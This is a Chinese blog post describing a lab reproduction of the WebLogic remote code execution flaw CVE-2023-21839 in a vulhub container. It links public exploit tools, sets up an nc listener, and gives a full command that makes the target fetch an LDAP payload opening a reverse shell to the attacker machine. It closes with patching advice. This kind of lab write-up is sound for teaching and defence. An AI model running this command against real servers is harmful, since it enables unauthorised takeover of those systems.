Weblogic远程代码执行漏洞 CVE-2023-21839

最新推荐文章于 2023-12-14 04:30:00 发布
最新推荐文章于 2023-12-14 04:30:00 发布
阅读量1k 收藏 2
点赞数 2
文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuzhong9208/article/details/130063300
版权

漏洞简介

        WebLogic Core远程代码执行漏洞(CVE-2023-21839),该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议进行 JNDI lookup 操作,破坏易受攻击的WebLogic服务器,成功利用此漏洞可能导致Oracle WebLogic服务器被接管(RCE)或敏感信息泄露。

复现环境

        靶机:kali vullhub docker启动:192.168.42.147

        攻击机:kali 192.168.42.145

复现过程

  • 在靶机上启动vulhub的靶场环境,进入如下目录启动

         

         启动成功

        

  • 使用工具JNDIExploit-4-SNAPSHOT.jar在kali上设置监听

  1.        工具地址及其使用说明:https://github.com/WhiteHSBG/JNDIExploit

           这个工具是同时启动了http和ldap服务

    1.       

  • 打开kali使用nc工具进行端口的监听,用于接收反弹的shell

  1.       

  • 使用CVE-2023-21839工具来进行攻击测试

 工具地址:https://github.com/DXask88MA/Weblogic-CVE-2023-21839

 使用命令:

java -jar Weblogic-CVE-2023-21839.jar 192.168.42.147:7001 ldap://192.168.42.145:1389/Basic/ReverseShell/192.168.42.145/7777

  • 此时监听的攻击机已经收到了反弹的shell

   

 至此攻击已经成功

  • 最后关闭靶机

 

 处置修复

参考修复链接:https://www.oracle.com/security-alerts/cpujan2023.html

  1. 升级版本
  2. 安装补丁
  3. 若非必须开启,请禁用T3和IIOP协议。

相关修复链接见https://mp.weixin.qq.com/s/MgO_KJQiEXK_GpVACI2pJg

 

昀光Icrus
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
CVE-2023-21839Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 3268
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
漏洞复现】Weblogic CVE-2023-21839
zg_111的博客
03-23 6236
Weblogic CVE-2023-21839漏洞复现
CVE-2023-21839远程代码执行漏洞
刘家华(游戏开发)
05-01 1452
weblogic CVE-2023-21839CVE-2023-21931、CVE-2023-21979远程代码执行漏洞复现。
Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)
wangluoanquan111的博客
10-09 444
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
Weblogic-CVE-2023-21839
最新发布
Continuejww的博客
12-14 602
RCE漏洞,该漏洞允许未经身份验证的远程,通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致Oracle WebLogic服务器被接管,通过远程协议进行远程命令执行,当或本地存在小工具(javaSerializedData)时,可能导致远程代码执行。由此可见:CVE-2023-21839是一个weblogic的JNDI注入漏洞
Weblogic 远程命令执行漏洞CVE-2023-21839
Myu_wzy的博客
04-27 763
Weblogic 远程命令执行漏洞CVE-2023-21839
WebLogic WLS远程执行漏洞(CVE-2017-10271)验证
12-18
一段小代码WebLogic WLS远程执行漏洞(CVE-2017-10271)验证。
CVE-2023-21839:Oracle WebLogic Server RCE
qq_45747465的博客
07-07 505
努力提升自己呀
Weblogic远程代码执行漏洞CVE-2023-21839)排大坑复现成功
huayimy的博客
04-20 1206
Weblogic远程代码执行漏洞CVE-2023-21839)排大坑复现成功
CVE-2023-21839 WebLogic Server RCE分析
Jay
04-18 767
在后续的进行lookup操作之前会检查 JNDI 环境是否已正确配置以访问远程资源,主要是对jndiEnvironment和remoteJNDIName的检测,如果在if中的任何一个条件为真,那么将调用对象的lookup方法,如果 if 语句中的所有条件都为假,则会进入检查cachedReferent字段的阶段。weblogic10 及以后的版本,不能直接使用server/lib 目录下的 weblogic.jar 了,需要手动执行一个命令生成手动生成 wlfullclient.jar
【高危】WebLogic Server 远程代码执行漏洞复现及攻击拦截 (CVE-2023-21839)
xsharkrasp的博客
05-18 532
近日,Oracle WebLogic Server被检测到远程代码执行漏洞(CVE-2023-21839),该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致关键数据的未授权访问或直接获取WebLogic服务器权限。当远程对象继承自OpaqueReference时,客户端在对该对象进行JNDI查找并获取的时候,服务器端实际上是通过调用远程对象的getReferent()方法来获取该对象的实际引用。发起攻击请求:新建/tmp/1.txt文件。
CVE-2023-21839漏洞复现
qq_34914659的博客
02-28 3926
CVE-2023-21839漏洞复现
CVE-2023-21839 【vulhub weblogic 漏洞复现】
weixin_46044002的博客
07-06 274
由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
Weblogic远程代码执行漏洞CVE-2023-21839)复现/保姆级讲解
BGiscool的博客
02-28 3978
由于WeblogicIIOP/T3协议存在缺陷,当IIOP/T3协议开启时,未经身份验证的攻击者通过IIOP/T3协议向受影响的服务器发送恶意的请求,最终导致在目标服务器上访问敏感信息并执行任意代码
CVE-2023-21839
08-17
CVE-2023-21839是一个Weblogic漏洞,可以导致远程代码执行。根据引用提供的信息,可以使用nc工具进行端口监听,用于接收反弹的shell。你可以在给出的GitHub链接中找到可用的工具。使用该工具前,需要先编译为可执行文件。另外,在引用中提到,可以使用docker-compose启动CVE-2023-21839漏洞环境。具体命令为sudo docker-compose up -d。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CVE-2023-21839Weblogic反序列化漏洞复现](https://blog.csdn.net/weixin_48539059/article/details/130101435)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2023-21839EXP可执行文件](https://download.csdn.net/download/qq_51577576/87559811)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值